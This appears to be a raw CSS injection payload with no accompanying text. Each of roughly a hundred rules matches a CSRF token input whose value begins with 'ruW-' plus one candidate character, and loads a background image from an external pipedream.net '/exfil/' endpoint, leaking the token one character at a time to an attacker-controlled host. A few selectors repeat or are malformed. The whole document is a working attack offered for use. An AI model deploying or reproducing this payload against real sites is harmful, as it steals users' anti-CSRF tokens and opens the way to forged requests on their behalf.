input[name=csrf][value^="ruW-a"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-a); }
input[name=csrf][value^="ruW-z"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-z); }
input[name=csrf][value^="ruW-e"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-e); }
input[name=csrf][value^="ruW-r"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-r); }
input[name=csrf][value^="ruW-t"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-t); }
input[name=csrf][value^="ruW-y"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-y); }
input[name=csrf][value^="ruW-u"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-u); }
input[name=csrf][value^="ruW-i"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-i); }
input[name=csrf][value^="ruW-o"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-o); }
input[name=csrf][value^="ruW-p"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-p); }
input[name=csrf][value^="ruW-q"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-q); }
input[name=csrf][value^="ruW-s"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-s); }
input[name=csrf][value^="ruW-d"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-d); }
input[name=csrf][value^="ruW-f"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-f); }
input[name=csrf][value^="ruW-g"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-g); }
input[name=csrf][value^="ruW-h"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-h); }
input[name=csrf][value^="ruW-j"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-j); }
input[name=csrf][value^="ruW-k"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-k); }
input[name=csrf][value^="ruW-l"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-l); }
input[name=csrf][value^="ruW-m"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-m); }
input[name=csrf][value^="ruW-w"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-w); }
input[name=csrf][value^="ruW-x"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-x); }
input[name=csrf][value^="ruW-c"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-c); }
input[name=csrf][value^="ruW-v"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-v); }
input[name=csrf][value^="ruW-b"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-b); }
input[name=csrf][value^="ruW-n"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-n); }
input[name=csrf][value^="ruW-A"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-A); }
input[name=csrf][value^="ruW-Z"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-Z); }
input[name=csrf][value^="ruW-E"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-E); }
input[name=csrf][value^="ruW-R"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-R); }
input[name=csrf][value^="ruW-T"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-T); }
input[name=csrf][value^="ruW-Y"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-Y); }
input[name=csrf][value^="ruW-U"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-U); }
input[name=csrf][value^="ruW-I"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-I); }
input[name=csrf][value^="ruW-O"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-O); }
input[name=csrf][value^="ruW-P"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-P); }
input[name=csrf][value^="ruW-Q"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-Q); }
input[name=csrf][value^="ruW-S"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-S); }
input[name=csrf][value^="ruW-D"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-D); }
input[name=csrf][value^="ruW-F"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-F); }
input[name=csrf][value^="ruW-G"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-G); }
input[name=csrf][value^="ruW-H"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-H); }
input[name=csrf][value^="ruW-J"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-J); }
input[name=csrf][value^="ruW-K"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-K); }
input[name=csrf][value^="ruW-L"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-L); }
input[name=csrf][value^="ruW-M"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-M); }
input[name=csrf][value^="ruW-W"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-W); }
input[name=csrf][value^="ruW-X"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-X); }
input[name=csrf][value^="ruW-C"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-C); }
input[name=csrf][value^="ruW-V"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-V); }
input[name=csrf][value^="ruW-B"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-B); }
input[name=csrf][value^="ruW-N"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-N); }
input[name=csrf][value^="ruW-0"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-0); }
input[name=csrf][value^="ruW-1"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-1); }
input[name=csrf][value^="ruW-2"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-2); }
input[name=csrf][value^="ruW-3"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-3); }
input[name=csrf][value^="ruW-4"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-4); }
input[name=csrf][value^="ruW-5"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-5); }
input[name=csrf][value^="ruW-6"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-6); }
input[name=csrf][value^="ruW-7"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-7); }
input[name=csrf][value^="ruW-8"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-8); }
input[name=csrf][value^="ruW-9"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-9); }
input[name=csrf][value^="ruW-_"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-_); }
input[name=csrf][value^="ruW--"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW--); }
input[name=csrf][value^="ruW-é"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-é); }
input[name=csrf][value^="ruW-à"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-à); }
input[name=csrf][value^="ruW-è"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-è); }
input[name=csrf][value^="ruW-ù"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-ù); }
input[name=csrf][value^="ruW-ç"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-ç); }
input[name=csrf][value^="ruW-€"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-€); }
input[name=csrf][value^="ruW-£"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-£); }
input[name=csrf][value^="ruW-?"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-?); }
input[name=csrf][value^="ruW-,"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-,); }
input[name=csrf][value^="ruW-;"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-;); }
input[name=csrf][value^="ruW-:"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-:); }
input[name=csrf][value^="ruW-!"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-!); }
input[name=csrf][value^="ruW-?"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-?); }
input[name=csrf][value^="ruW-."]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-.); }
input[name=csrf][value^="ruW-/"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-/); }
input[name=csrf][value^="ruW-§"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-§); }
input[name=csrf][value^="ruW-$"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-$); }
input[name=csrf][value^="ruW-é"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-é); }
input[name=csrf][value^="ruW-è"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-è); }
input[name=csrf][value^="ruW-&"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-&); }
input[name=csrf][value^="ruW-="]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-=); }
input[name=csrf][value^="ruW-+"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-+); }
input[name=csrf][value^="ruW-<"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-<); }
input[name=csrf][value^="ruW->"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW->); }
input[name=csrf][value^="ruW-~"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-~); }
input[name=csrf][value^="ruW-#"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-#); }
input[name=csrf][value^="ruW-*"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-*); }
input[name=csrf][value^="ruW-%"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-%); }
input[name=csrf][value^="ruW-""]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-"); }
input[name=csrf][value^="ruW-'"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-'); }
input[name=csrf][value^="ruW-{"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-{); }
input[name=csrf][value^="ruW-}"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-}); }
input[name=csrf][value^="ruW-("]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-(); }
input[name=csrf][value^="ruW-)"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-)); }
input[name=csrf][value^="ruW-["]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-[); }
input[name=csrf][value^="ruW-]"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-]); }
input[name=csrf][value^="ruW-|"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-|); }
input[name=csrf][value^="ruW-\"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-\); }
input[name=csrf][value^="ruW-/"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-/); }
input[name=csrf][value^="ruW-^"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-^); }
input[name=csrf][value^="ruW-@"]{ background-image: url(https://enmpi2h5fklr.x.pipedream.net/exfil/ruW-@); }
